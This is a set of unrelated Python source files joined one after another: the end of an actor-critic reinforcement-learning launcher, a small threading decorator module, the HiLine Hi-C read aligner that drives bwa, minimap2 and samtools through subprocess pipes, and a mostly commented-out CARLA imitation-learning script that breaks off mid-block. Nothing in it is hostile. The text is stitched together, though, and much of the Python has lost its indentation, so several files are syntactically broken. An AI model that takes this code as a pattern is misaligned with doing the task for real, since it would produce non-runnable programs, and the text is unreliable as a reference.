parser.add_argument('--density_lr', '-dlr', type=float, default=5e-3)
parser.add_argument('--density_train_iters', '-dti', type=int, default=1000)
parser.add_argument('--density_batch_size', '-db', type=int, default=64)
parser.add_argument('--density_hiddim', '-dh', type=int, default=32)
parser.add_argument('--replay_size', '-rs', type=int, default=int(1e6))
parser.add_argument('--sigma', '-sig', type=float, default=0.2)
########################################################################
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size,
########################################################################
bonus_coeff=args.bonus_coeff,
kl_weight=args.kl_weight,
density_lr=args.density_lr,
density_train_iters=args.density_train_iters,
density_batch_size=args.density_batch_size,
density_hiddim=args.density_hiddim,
dm=args.density_model,
replay_size=args.replay_size,
sigma=args.sigma
########################################################################
)
if args.n_experiments > 1:
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
else:
train_func()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
decorators.py
|
"""
decorators.py: Custom decorators
__author__ = "Fernando P. Lopes"
__email__ = "fpedrosa@gmail.com"
"""
from functools import wraps
from threading import Thread


def async_decorator(f):
    """Run the decorated function in a background thread and return the started Thread."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        thr = Thread(target=f, args=args, kwargs=kwargs)
        thr.start()
        return thr
    return wrapper
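# Usage sketch (illustrative; `send_email` is a made-up example, not part of this module):
#
#   @async_decorator
#   def send_email(recipient, body):
#       ...  # slow I/O now runs off the calling thread
#
#   t = send_email("user@example.com", "hello")  # returns immediately with the Thread
#   t.join()                                     # optionally wait for it to finish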
|
aligner.py
|
# Copyright (c) 2020 Ed Harry, Wellcome Sanger Institute
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sys
import click
import hashlib
import re
import gzip
import os
import warnings
from os import makedirs
from os.path import isdir, isfile, join, basename, normpath, realpath, dirname
from subprocess import Popen, PIPE, STDOUT, check_output
from enum import Enum, auto
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from tempfile import NamedTemporaryFile
from binascii import hexlify
from threading import Thread
from pathlib import Path
from HiLine import version
from HiLine import Pipeline as pl
from _Aligner import _Aligner_Main
NAME = "_HiLine_Aligner"
DESCRIPTION = "Restriction digest aware HiC aligner. Part of HiLine."
LICENCE = "Copyright (c) 2020 Ed Harry, Wellcome Sanger Institute."
logger = logging.getLogger(__name__)
def create_logger_handle(stream, typeid, level):
class LogFilter(logging.Filter):
def __init__(self, level):
super().__init__()
self.__level = level
def filter(self, record):
return record.levelno == self.__level
handle = logging.StreamHandler(stream=stream)
handle.setLevel(level=level)
handle.setFormatter(
logging.Formatter("[Aligner {id}] :: %(message)s".format(id=typeid))
)
handle.addFilter(LogFilter(level=level))
return handle
class LoggerHandle(object):
def __init__(self):
self.threadsAndHandles = []
def add_logger(self, log_func, id):
read, write = os.pipe()
def _thread_func():
with os.fdopen(read, encoding="utf-8", errors="replace") as file:
for line in file:
log_func("({id}) {mess}".format(id=id, mess=line[:-1]))
thread = Thread(target=_thread_func)
thread.start()
self.threadsAndHandles.append((thread, write))
return write
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for thread, handle in self.threadsAndHandles:
os.close(handle)
thread.join()
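# LoggerHandle usage sketch (illustrative): each add_logger() call returns a writable pipe
# file descriptor that a subprocess can use as stdout/stderr; a reader thread forwards every
# line to the given logging function, and __exit__ closes the write ends and joins the readers.
#
#   with LoggerHandle() as lh:
#       fd = lh.add_logger(logger.info, "samtools")
#       Popen(["samtools", "--version"], stdout=fd, stderr=fd).wait()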
def documenter(docstring):
def inner_documenter(f):
f.__doc__ = docstring
return f
return inner_documenter
@click.command()
@documenter(
"""
{name} {ver}. {des}
{lic}
""".format(
name=NAME, ver=version, des=DESCRIPTION, lic=LICENCE
)
)
@click.argument("reference", type=click.Path(exists=True))
@click.argument("reads", type=click.File("rb", lazy=False), nargs=-1)
@click.option("--site", type=(str, int, int), multiple=True)
@click.option(
"-t",
"--threads",
type=click.IntRange(2, None, clamp=True),
default=2,
)
@click.option("--tag", type=str, multiple=True)
@click.option("--trim/--no-trim", default=True)
@click.option("--bwa1", "aligner", flag_value=1)
@click.option("--bwa2", "aligner", flag_value=2, default=True)
@click.option("--minimap2", "aligner", flag_value=3, default=True)
@click.option("--align/--no-align", default=True)
def cli(reference, reads, site, threads, tag, trim, aligner, align):
logger.setLevel(logging.INFO)
logger.addHandler(
create_logger_handle(stream=sys.stderr, typeid="status", level=logging.INFO)
)
logger.addHandler(
create_logger_handle(stream=sys.stderr, typeid="error", level=logging.ERROR)
)
logger.addHandler(
create_logger_handle(stream=sys.stderr, typeid="warning", level=logging.WARNING)
)
def _showwarning(message, category, filename, lineno, file=None, line=None):
logger.warning(
f"[{filename} {lineno}] {message}"
if line is None
else f"[{filename} {lineno}] {message} {line}"
)
warnings.showwarning = _showwarning
if len(site) == 0 and trim:
logger.warning("No restriction sites specified, turning off trimming")
trim = False
if not (3 > len(reads) > 0):
raise click.BadArgumentUsage("only one or two read sources accepted")
class Aligner(object):
class Site(object):
class Overhang(Enum):
FIVE = auto()
THREE = auto()
BLUNT = auto()
@classmethod
def get(cls, fwd, rev):
if fwd < rev:
return cls.FIVE
elif rev < fwd:
return cls.THREE
else:
return cls.BLUNT
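                # For example, a site declared as ('GAATTC', 1, 5) (EcoRI-like) cuts the
                # forward strand after base 1 and the reverse strand opposite base 5, so
                # fwd < rev and the fragments carry a FIVE (5') 'AATT' overhang; fwd == rev
                # would give BLUNT ends.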
def __init__(self, site, fwd, rev):
self.site = site
self.fwd = fwd
self.rev = rev
if fwd < 0 or rev < 0:
raise click.BadOptionUsage(
"site fwd and rev locations must be non-negative integers"
)
self.cut_start = min(fwd, rev)
self.cut_end = max(fwd, rev)
self.overhang = self.Overhang.get(fwd, rev)
def __str__(self):
return ",".join((self.site, str(self.fwd), str(self.rev)))
def __init__(
self, aligner, trim, reference, reads, sites, threads, sam_tags, align
):
self.trim = trim
self.reference = reference
self.reads_from_stdin = "<stdin>" in [read.name for read in reads]
self.sites = [self.Site(*site) for site in sites]
self.sam_tags = sam_tags
self.threads = threads
self.align = align
self.name = self.reference + "." + str(self.hash) + ".HiLine_Reference"
self.aligner = self.get_aligner(
threads=threads // 2 if trim else threads,
reads=["-" if read.name == "<stdin>" else read.name for read in reads],
version=aligner,
)
@staticmethod
def get_aligner(threads, reads, version):
class Aligner(object):
def index_command(self, fasta, prefix=None):
if prefix is None:
prefix = basename(normpath(fasta))
prefix += "." + self.program_name
return self.program_name + " index -p " + prefix + " " + fasta
def run_command(self, reference, stdin=False):
return (
self.program_name
+ " mem -5SPYC{p} -t {threads} -B 8 {ref} {r1}{r2}".format(
p="p" if stdin else ("p" if len(reads) == 1 else ""),
threads=threads,
ref=reference + "." + self.program_name,
r1="-" if stdin else reads[0],
r2=""
if stdin
else (" " + reads[1] if len(reads) == 2 else ""),
)
)
def run_process(self, reference, stdin=None, stderr=None, stdout=None):
return Popen(
self.run_command(
reference=reference, stdin=stdin is not None
).split(),
stderr=stderr,
stdout=stdout,
stdin=stdin,
)
class Bwa1(Aligner):
program_name = "bwa"
index_extensions = ("amb", "ann", "bwt", "pac", "sa")
class Bwa2(Aligner):
program_name = "bwa-mem2"
index_extensions = (
"0123",
"amb",
"ann",
"bwt.2bit.64",
"pac",
)
class MiniMap2:
program_name = "minimap2"
index_extensions = ("index",)
def index_command(self, fasta, prefix=None):
if prefix is None:
prefix = basename(normpath(fasta))
prefix += "." + self.program_name
return (
self.program_name
+ " -t "
+ str(threads)
+ " -d "
+ prefix
+ "."
+ self.index_extensions[0]
+ " "
+ "-x sr "
+ fasta
)
def run_process(self, reference, stdin=None, stderr=None, stdout=None):
return Popen(
[
"gawk",
"-v",
"FS=\t",
"-v",
"OFS=\t",
"{if ($1 ~ /^@/) {print($0)} else {$2=and($2,compl(2048)); print(substr($0,2))}}",
],
stdout=stdout,
stderr=stderr,
stdin=Popen(
[
"perl",
str(
Path(dirname(realpath(__file__)))
/ "filter_five_end.pl"
),
],
stdout=PIPE,
stderr=stderr,
stdin=Popen(
[
"gawk",
"{if ($1 ~ /^@/) {print($0)} else if (and($2,64)>0) {print(1$0)} else {print(2$0)}}",
],
stdout=PIPE,
stderr=stderr,
stdin=Popen(
(
self.program_name
+ " -yYt "
+ str(threads)
+ " -ax sr "
+ reference
+ "."
+ self.program_name
+ "."
+ self.index_extensions[0]
+ " "
+ ("-" if stdin is not None else reads[0])
+ (
""
if stdin is not None
else (
(" " + reads[1])
if len(reads) == 2
else ""
)
)
).split(),
stdin=stdin,
stdout=PIPE,
stderr=stderr,
).stdout,
).stdout,
).stdout,
)
if version == 3:
try:
with Popen(
"minimap2 --version".split(), stdout=PIPE, stderr=STDOUT
) as process:
output = "".join(
[
line.decode("utf-8")
for line in process.stdout.readlines()
]
)
match = re.search(
r"(?P<major>\d+)\.(?P<minor1>\d+)-r(?P<minor2>\d+)",
output,
)
if match is None:
raise Exception("Could not determine 'minimap2' version")
major = int(match.group("major"))
minor1 = int(match.group("minor1"))
minor2 = int(match.group("minor2"))
if not (
major > 2
or (major == 2 and minor1 > 17)
or (major == 2 and minor1 == 17 and minor2 >= 941)
):
raise Exception(
"'minimap2' version {major}.{minor1}-r{minor2} found, version 2.17-r941 or greater required".format(
major=major, minor1=minor1, minor2=minor2
)
)
logger.info("Using minimap2")
return MiniMap2()
except Exception as ex:
sys.exit(str(ex))
try:
if version == 1:
raise FileNotFoundError("bwa 1 selected")
with Popen(
"bwa-mem2 version".split(), stdout=PIPE, stderr=STDOUT
) as process:
output = "".join(
line.decode("utf-8") for line in process.stdout.readlines()
)
match = re.search(
r"(?P<major>\d+)\.(?P<minor1>\d+)\.?(?P<minor2>\d*)", output
)
if match is None:
raise FileNotFoundError("Could not determine 'bwa-mem2' version")
major = int(match.group("major"))
if not (major >= 2):
raise FileNotFoundError(
"Only 'bwa-mem2' version 2 or higher supported"
)
logger.info("Using bwa-mem2")
return Bwa2()
except FileNotFoundError as ex:
logger.info(str(ex))
try:
with Popen("bwa", stdout=PIPE, stderr=STDOUT) as process:
output = "".join(
[
line.decode("utf-8")
for line in process.stdout.readlines()
]
)
match = re.search(
r"Version: (?P<major>\d+)\.(?P<minor1>\d+)\.(?P<minor2>\d+)",
output,
)
if match is None:
raise Exception("Could not determine 'bwa' version")
major = int(match.group("major"))
minor1 = int(match.group("minor1"))
minor2 = int(match.group("minor2"))
if not (
major > 0
or (major == 0 and minor1 > 7)
or (major == 0 and minor1 == 7 and minor2 >= 17)
):
raise Exception(
"'bwa' version {major}.{minor1}.{minor2} found, version 0.7.17 or greater required".format(
major=major, minor1=minor1, minor2=minor2
)
)
logger.info("Using bwa")
return Bwa1()
except Exception as ex:
sys.exit(str(ex))
def digest(self, record):
cuts = [
(0, self.Site.Overhang.BLUNT, ""),
(len(record), self.Site.Overhang.BLUNT, ""),
]
for site in self.sites:
for match in re.finditer(site.site, str(record.seq)):
cuts.append(
(
match.start() + site.fwd,
site.overhang,
match.group()[site.cut_start : site.cut_end],
)
)
cuts.sort(key=lambda cut: cut[0])
for cut_start, cut_end in zip(cuts[:-1], cuts[1:]):
overhang_start = (
cut_start[2] if cut_start[1] == self.Site.Overhang.THREE else ""
)
overhang_end = (
cut_end[2] if cut_end[1] == self.Site.Overhang.FIVE else ""
)
yield SeqRecord(
overhang_start
+ record.seq[cut_start[0] : cut_end[0]]
+ overhang_end,
id=record.id
+ "_"
+ str(cut_start[0])
+ "_"
+ str(len(cut_start[2]))
+ ("+" if cut_start[1] == self.Site.Overhang.THREE else "-")
+ "_"
+ str(len(cut_end[2]))
+ ("+" if cut_end[1] == self.Site.Overhang.FIVE else "-"),
description="",
name="",
)
logger.info(
"{id} digested into {n} fragments".format(id=record.id, n=len(cuts) - 1)
)
def index(self, logger_handle):
threads = []
if self.trim and not (
isdir(self.name)
and all(
isfile(
join(self.name, "ref." + self.aligner.program_name + "." + ext)
)
for ext in self.aligner.index_extensions
)
):
logger.info("Creating virtual digestion index...")
def thread_fn():
def get_open(reference):
with open(reference, "rb") as file:
return (
gzip.open(reference, "rt")
if hexlify(file.read(2)) == b"1f8b"
else open(reference)
)
makedirs(self.name, exist_ok=True)
with NamedTemporaryFile(
mode="w", buffering=True, suffix="", prefix="ref", dir=self.name
) as tmp_file:
with get_open(self.reference) as ref_file:
for rec in SeqIO.parse(ref_file, "fasta"):
for digest_rec in self.digest(rec):
SeqIO.write(digest_rec, tmp_file, "fasta")
handle = logger_handle.add_logger(
logger.info, "index digestion fragments"
)
with Popen(
self.aligner.index_command(
prefix="ref", fasta=tmp_file.name
).split(),
cwd=self.name,
stderr=handle,
stdout=handle,
) as process:
process.communicate()
thread = Thread(target=thread_fn)
thread.start()
threads.append(thread)
if not (
all(
isfile(self.reference + "." + self.aligner.program_name + "." + ext)
for ext in self.aligner.index_extensions
)
):
logger.info("Creating reference index...")
def thread_fn():
handle = logger_handle.add_logger(logger.info, "index reference")
with Popen(
self.aligner.index_command(fasta=self.reference).split(),
stderr=handle,
stdout=handle,
) as process:
process.communicate()
thread = Thread(target=thread_fn)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
logger.info("Indexing finished")
def run(self):
try:
try:
match = re.match(
r"^samtools (?P<major>\d+)\.(?P<minor>\d+)",
check_output(
"samtools --version".split(), stderr=STDOUT
).decode("utf-8"),
)
if match is None:
raise Exception("Could not determine 'samtools' version")
major = int(match.group("major"))
minor = int(match.group("minor"))
if not (major > 1 or (major == 1 and minor >= 10)):
raise Exception(
"'samtools' version {major}.{minor} found, version 1.10 or greater required".format(
major=major, minor=minor
)
)
samtools_version = "{major}.{minor}".format(
major=major, minor=minor
)
except FileNotFoundError:
raise Exception("'samtools' not found on $PATH")
except Exception as ex:
sys.exit(str(ex))
with LoggerHandle() as logger_handle:
self.index(logger_handle)
if self.align:
if self.trim:
handle = logger_handle.add_logger(
logger.info, "digestion fragment alignment"
)
with Popen(
"samtools view -@ {threads} -hF 0x900 -".format(
threads=self.threads
).split(),
stdout=PIPE,
stderr=handle,
stdin=self.aligner.run_process(
reference=join(self.name, "ref"),
stderr=handle,
stdout=PIPE,
stdin=sys.stdin if self.reads_from_stdin else None,
).stdout,
) as view_process:
read_, write_ = os.pipe()
def main_fn():
class RunParams(object):
samInput = view_process.stdout
samOutput = write_
nThreads = self.threads
info = logger_handle.add_logger(
logger.info, "read trimming"
)
error = logger_handle.add_logger(
logger.error, "read trimming"
)
_Aligner_Main(params=RunParams())
os.close(write_)
thread = Thread(target=main_fn)
thread.start()
threads = [thread]
read, write = os.pipe()
global seen_header
seen_header = False
global pg_lines
pg_lines = []
def thread_fn():
global seen_header
global pg_lines
with os.fdopen(write, "wb") as f_out, os.fdopen(
read_, "rb"
) as f_in:
for line in f_in:
if not seen_header:
if (
decoded_line := line.decode(
"utf-8", errors="replace"
)
).startswith("@"):
if decoded_line.startswith("@PG"):
pg_lines.append(line)
else:
seen_header = True
f_out.write(line)
thread = Thread(target=thread_fn)
thread.start()
threads.append(thread)
samtools_fastq_cmd = "samtools fastq -@ {threads} -t{tags} -0 /dev/null -F 0x900 -".format(
tags=""
if len(self.sam_tags) == 0
else "T {tg}".format(
tg=",".join(t for t in self.sam_tags)
),
threads=self.threads,
)
handle = logger_handle.add_logger(
logger.info, "reference alignment"
)
with self.aligner.run_process(
reference=self.reference,
stdout=PIPE,
stderr=handle,
stdin=Popen(
samtools_fastq_cmd.split(),
stdout=PIPE,
stderr=handle,
stdin=read,
).stdout,
) as aligner_process:
def thread_fn_2():
global seen_header
global pg_lines
local_pg_lines = []
header_buffer = []
header_mode = True
for line in aligner_process.stdout:
if header_mode:
if (
decoded_line := line.decode(
"utf-8", errors="replace"
)
).startswith("@"):
if decoded_line.startswith("@PG"):
local_pg_lines.append(line)
else:
header_buffer.append(line)
else:
header_mode = False
while not seen_header:
pass
chain = pl.SamPGChain(pg_lines)
chain.append(
"@PG\tID:{id}\tPN:{pn}\tCL:{cl}\tDS:{ds}\tVN:{vn}\n".format(
id=NAME,
pn=NAME,
cl=" ".join(
[
basename(
normpath(
sys.argv[0]
)
)
]
+ sys.argv[1:]
),
vn=version,
ds=DESCRIPTION,
).encode(
"utf-8"
)
)
chain.append(
"@PG\tID:samtools\tPN:samtools\tVN:{version}\tCL:{cmd}\n".format(
version=samtools_version,
cmd=samtools_fastq_cmd,
).encode(
"utf-8"
)
)
for pg_line in local_pg_lines:
chain.append(pg_line)
for header_line in header_buffer:
sys.stdout.buffer.write(header_line)
for pg_line in chain:
sys.stdout.buffer.write(pg_line)
sys.stdout.buffer.write(line)
else:
sys.stdout.buffer.write(line)
thread_2 = Thread(target=thread_fn_2)
thread_2.start()
threads.append(thread_2)
for thread in threads:
thread.join()
else:
with self.aligner.run_process(
reference=self.reference,
stderr=logger_handle.add_logger(
logger.info, "reference alignment"
),
stdout=sys.stdout,
stdin=sys.stdin if self.reads_from_stdin else None,
) as process:
process.communicate()
def __str__(self):
return ";".join(
(
self.name,
self.reference,
str([str(site) for site in self.sites]),
)
)
@property
def hash(self):
return sum(
int(hashlib.sha256(string.encode("utf-8")).hexdigest(), 16)
for string in (
[basename(normpath(self.reference))]
+ [str(site) for site in self.sites]
)
) % (2 ** 64)
Aligner(
align=align,
aligner=aligner,
trim=trim,
reference=reference,
reads=reads,
sites=site,
threads=threads,
sam_tags=[t for tg in tag for t in tg.split()],
).run()
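
# Minimal standalone sketch of the 64-bit digest hashing performed by the `hash`
# property above: each input string's SHA-256 digest is summed and reduced mod 2**64.
# `_digest_hash_sketch` is a hypothetical helper for illustration only, not part of
# the tool's API, and it assumes plain strings as input.
def _digest_hash_sketch(reference_basename, sites):
    """Combine a reference name and digestion-site strings into a 64-bit checksum."""
    import hashlib
    return sum(
        int(hashlib.sha256(s.encode("utf-8")).hexdigest(), 16)
        for s in [reference_basename] + [str(site) for site in sites]
    ) % (2 ** 64)
# Example: _digest_hash_sketch("ref.fa", ["GATC", "AAGCTT"]) yields a deterministic
# integer, so the same reference/site combination always maps to the same value.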
|
test.py
|
"""
Copyright (c) College of Mechatronics and Control Engineering, Shenzhen University.
All rights reserved.
    Description:
        Train an imitator using the Carla standard control data.
    Author: Team Li
"""
import tensorflow as tf
import numpy as np
import sys, glob, os
try:
sys.path.append(glob.glob('**/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
import carla
except:
raise ImportError('Please check your carla file')
from carla_utils.logging import logger
from carla_utils.world_ops import *
from carla_utils.sensor_ops import *
from RL.DDPG.ddpg_utils import actor
import RL.rl_utils as rl_tools
import threading
import math
import cv2
#
#
# tf.app.flags.DEFINE_string(
# 'checkpoint_dir', '',
# 'The path to a checkpoint from which to fine-tune.')
#
# tf.app.flags.DEFINE_string(
# 'train_dir', './checkpoint/imitator',
# 'Directory where checkpoints are written to.')
#
# tf.app.flags.DEFINE_integer(
# 'batch_size', 32, 'The number of samples in each batch.')
#
# tf.app.flags.DEFINE_float('learning_rate', 3e-2, 'Initial learning rate.')
#
# tf.app.flags.DEFINE_integer(
# 'f_log_step', 50,
# 'The frequency with which logs are print.')
#
# tf.app.flags.DEFINE_integer(
# 'f_save_step', 10000,
# 'The frequency with which summaries are saved, in step.')
#
# tf.app.flags.DEFINE_integer(
# 'img_height', 416,
# 'raw image height')
#
# tf.app.flags.DEFINE_integer(
# 'img_width', 626,
# 'raw image width')
#
# FLAGS = tf.app.flags.FLAGS
# slim = tf.contrib.slim
#
#
# bgr_camera_config = {'data_type': 'sensor.camera.rgb', 'image_size_x': FLAGS.img_width,
# 'image_size_y': FLAGS.img_height, 'fov': 110, 'sensor_tick': 0.02,
# 'transform': carla.Transform(carla.Location(x=1.0, z=1.8)),
# 'attach_to':None}
# collision_sensor_config = {'data_type': 'sensor.other.collision','attach_to': None}
# obstacle_sensor_config = {'data_type': 'sensor.other.obstacle', 'sensor_tick': 0.02,
# 'distance': 3, 'attach_to': None}
#
# light_state_encode = {'Green':np.array([1., 0., 0., 0.]).astype(np.float32),
# 'Red':np.array([0., 1., 0., 0.]).astype(np.float32),
# 'Yellow':np.array([0., 0., 1., 0.]).astype(np.float32),
# 'Unkown':np.array([0., 0., 0., 1.]).astype(np.float32)}
#
#
# def steer_scene_classify(steer):
# """generate the winding one-hot groundtruth"""
# if steer >= -1. and steer < -0.5:
# return 0, np.eye(1, 11, k=0)[0].astype(np.int32)
# elif steer >= -0.5 and steer < -0.2:
# return 1, np.eye(1, 11, k=1)[0].astype(np.int32)
# elif steer >= -0.2 and steer < -0.1:
# return 2, np.eye(1, 11, k=2)[0].astype(np.int32)
# elif steer >= -0.1 and steer < -0.05:
# return 3, np.eye(1, 11, k=3)[0].astype(np.int32)
# elif steer >= -0.05 and steer < 0.:
# return 4, np.eye(1, 11, k=4)[0].astype(np.int32)
# elif steer >= 0. and steer < 0.05:
# return 5, np.eye(1, 11, k=5)[0].astype(np.int32)
# elif steer >= 0.05 and steer < 0.1:
# return 6, np.eye(1, 11, k=6)[0].astype(np.int32)
# elif steer >= 0.1 and steer < 0.2:
# return 7, np.eye(1, 11, k=7)[0].astype(np.int32)
# elif steer >= 0.2 and steer < 0.5:
# return 8, np.eye(1, 11, k=8)[0].astype(np.int32)
# elif steer >= 0.5 and steer <= 1.:
# return 9, np.eye(1, 11, k=9)[0].astype(np.int32)
#
#
# def model(input, is_training):
# """user define model
# Args:
# input: an input tensor
# is_training: indicate whether train or not
# Return:
# output tensor of which the meaning is defined by user.
# in this script, means [steer, throttle, brake]
# """
# net = actor()
# scene_logits, action, net_vars = net.build_graph(input, other_state=other_state, n_action_space=3, is_training=is_training,
# action_range=[[-1., 1.], [0., 1.], [0., 1.]], var_scope='online_actor')
# return scene_logits, action
#
#
# def single_execuate(target, args):
# threading.Thread(target=target, args=args).start()
#
#
# def check_whether_respawn_actors(world, vehicles):
# """check whether to respawn the static acotors in a frequency"""
# while True:
# if carla_actors_static(vehicles, bigger_than=0.8):
# respawn_static_actors(world, vehicles)
# time.sleep(20)
#
#
# def sample_thread(sess):
# """a thread used to collect the data from carla"""
# begin = True
#
# ## set all the egopilots to autopilot and init whether_wait_red_light
# whether_wait_red_light = {}
# for egopilot in egopilots:
# whether_wait_red_light[egopilot] = False
# egopilot.set_autopilot(enabled=True)
#
#
# while True:
# for camera, obj_collision, egopilot in zip(cameras, obj_collisions, egopilots):
# img = camera.get()
# collision = obj_collision.get()
#
# if collision:
# obj_collision.clear()
# ## if collision skip this memory
# single_execuate(target=respawn_actors, args=(world, [egopilot],))
# continue
#
# # cv2.imshow('test', img)
#
# # img = img[FLAGS.img_height//2:, FLAGS.img_width//5:4*FLAGS.img_width//5, :] ## corp the ROI
# img = img*2./255. - 1.
# img = cv2.resize(img, dsize=(224, 224))
#
# std_steer = egopilot.get_control().steer
# std_throttle = egopilot.get_control().throttle
# std_brake = egopilot.get_control().brake
#
# scene_class, steer_scene_encode = steer_scene_classify(steer=std_steer)
#
# # if std_steer<0.05 and std_steer>-0.05:
# # a = random.uniform(0,1)
# # if a < 0.8:
# # continue
#
# ego_v = egopilot.get_velocity()
# ego_v_ = math.sqrt(ego_v.x ** 2 + ego_v.x ** 2 + ego_v.x ** 2)
# ego_v = ego_v_ / egopilot.get_speed_limit()
#
# if egopilot.is_at_traffic_light() and not whether_wait_red_light[egopilot]:
# ## mean first go into traffic light area
# if str(egopilot.get_traffic_light_state()) == 'Green':
# # print('Green, straght forward')
# scene_class = 10 ## mean straght forward
# elif str(egopilot.get_traffic_light_state()) == 'Red':
# # print('Red, Stop')
# whether_wait_red_light[egopilot] = True
# scene_class = 11 ## mean need to stop
# light_state = light_state_encode[str(egopilot.get_traffic_light_state())]
# elif whether_wait_red_light[egopilot]:
# if str(egopilot.get_traffic_light_state()) == 'Green':
# whether_wait_red_light[egopilot] = False
# # print('Red to Green, I can go now')
# std_throttle = 1.
# std_brake = 0.
# # print('throttle:', std_throttle)
# # print('brake:', std_brake)
# scene_class = 12 ## mean red to green
# elif str(egopilot.get_traffic_light_state()) == 'Red':
# print('Still Red, wait for green')
# whether_wait_red_light[egopilot] = True
# scene_class = 11 ## mean need to stop
# light_state = light_state_encode[str(egopilot.get_traffic_light_state())]
# else:
# if ego_v_ < 1e-3: ## imitate ahead obstcle
# steer_scene_encode = np.eye(1, 11, k=10)[0].astype(np.int32)
# # print("stop!!!")
# # else:
# # print('go forward')
# light_state = light_state_encode['Unkown']
#
# std_action = np.array([std_steer, std_throttle, std_brake])
# other_state = np.concatenate([light_state, np.array([ego_v])], axis=-1)
#
# memory_pool.put(memory=[img.astype(np.float32), other_state.astype(np.float32), std_action.astype(np.float32), steer_scene_encode],
# class_index=scene_class)
# cv2.waitKey(200)
# # time.sleep(0.2)
#
# if begin and memory_pool.is_balance():
# begin = False
# update_event.set()
#
#
# def update_thread(sess):
# """a thread used to train an actor net"""
# update_event.wait()
# logger.info('Begin update the actor...')
#
# avg_clf_loss = 0.
# avg_ops_loss = 0.
# current_step = 0
# while True:
# memorys = memory_pool.get(batch_size=FLAGS.batch_size)
# imgs = []
# other_states = []
# actions = []
# scene_labels = []
#
# # img = memorys[0][0]
# # img = np.uint8((img+1.)*255./2)
# # print('state:', memorys[0][1])
# # print('action:', memorys[0][2])
# #
# # cv2.imshow('test', img)
# # cv2.waitKey()
#
# for memory in memorys:
# imgs.append(memory[0])
# other_states.append(memory[1])
# actions.append(memory[2])
# scene_labels.append(memory[3])
#
# if current_step < 60000:
# op, clf_l, ops_l, current_step = sess.run([update_ops, clf_loss, ops_loss, global_step], feed_dict={input: np.array(imgs),
# other_state: np.array(
# other_states),
# std_action: np.array(
# actions),
# scene_label: np.array(
# scene_labels),
# lr:FLAGS.learning_rate})
# # op, net_loss, current_step = sess.run([update_ops, clf_loss, global_step], feed_dict={input: np.array(imgs),
# # scene_label:np.array(scene_labels),
# # lr: FLAGS.learning_rate})
# elif current_step < 120000:
# op, clf_l, ops_l, current_step = sess.run([update_ops, clf_loss, ops_loss, global_step], feed_dict={input: np.array(imgs),
# other_state: np.array(
# other_states),
# std_action: np.array(
# actions),
# scene_label: np.array(
# scene_labels),
# lr: FLAGS.learning_rate/10})
# # op, net_loss, current_step = sess.run([update_ops, clf_loss, global_step], feed_dict={input: np.array(imgs),
# # scene_label: np.array(
# # scene_labels),
# # lr: FLAGS.learning_rate/10})
# elif current_step < 8000000:
# op, clf_l, ops_l, current_step = sess.run([update_ops, clf_loss, ops_loss, global_step], feed_dict={input: np.array(imgs),
# other_state: np.array(other_states),
# std_action: np.array(actions),
# scene_label: np.array(scene_labels),
# lr: FLAGS.learning_rate/100})
# # op, net_loss, current_step = sess.run([update_ops, clf_loss, global_step], feed_dict={input: np.array(imgs),
# # scene_label: np.array(
# # scene_labels),
# # lr: FLAGS.learning_rate/100})
# else:
# break
#
# if FLAGS.f_log_step != None:
# ## caculate average loss ##
# step = current_step % FLAGS.f_log_step
# avg_ops_loss = (avg_ops_loss * step + ops_l) / (step + 1.)
# avg_clf_loss = (avg_clf_loss * step + clf_l) / (step + 1.)
# if current_step % FLAGS.f_log_step == FLAGS.f_log_step - 1:
# logger.info('Step%s ops_loss:%s clf_loss:%s' % (str(current_step), str(avg_ops_loss), str(avg_clf_loss)))
#
# if FLAGS.f_save_step != None:
# if current_step % FLAGS.f_save_step == FLAGS.f_save_step - 1:
# ## save model ##
# logger.info('Saving model...')
# model_name = os.path.join(FLAGS.train_dir, 'imitator.model')
# saver.save(sess, model_name)
# logger.info('Save model sucess...')
#
#
# if __name__ == '__main__':
# input = tf.placeholder(shape=[None, 224, 224, 3], dtype=tf.float32)
# other_state = tf.placeholder(shape=[None, 5], dtype=tf.float32)
# std_action = tf.placeholder(shape=[None, 3], dtype=tf.float32)
